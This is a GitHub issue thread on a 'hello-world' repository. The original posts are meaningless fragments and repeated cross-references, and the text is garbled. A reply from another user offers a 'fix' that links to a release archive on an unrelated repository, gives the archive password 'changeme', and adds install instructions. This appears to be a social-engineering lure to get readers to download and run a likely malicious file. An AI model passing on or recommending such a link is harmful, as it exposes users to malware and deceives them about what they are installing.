### ISSUE TITLE
Damn  Δημήτρης του

### ISSUE THREAD

**Issue by DrUnpopular** [DrUnpopular/hello-world#10]
Damn 

_Originally posted by @DrUnpopular in https://github.com/DrUnpopular/desktop-tutorial/issues/8#issuecomment-2258612865_

_Originally posted by @DrUnpopular in https://github.com/DrUnpopular/hello-world/issues/7_

_Originally posted by @DrUnpopular in https://github.com/DrUnpopular/hello-world/issues/8_

**Comment by DrUnpopular** [comment]
De gui out etu it

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
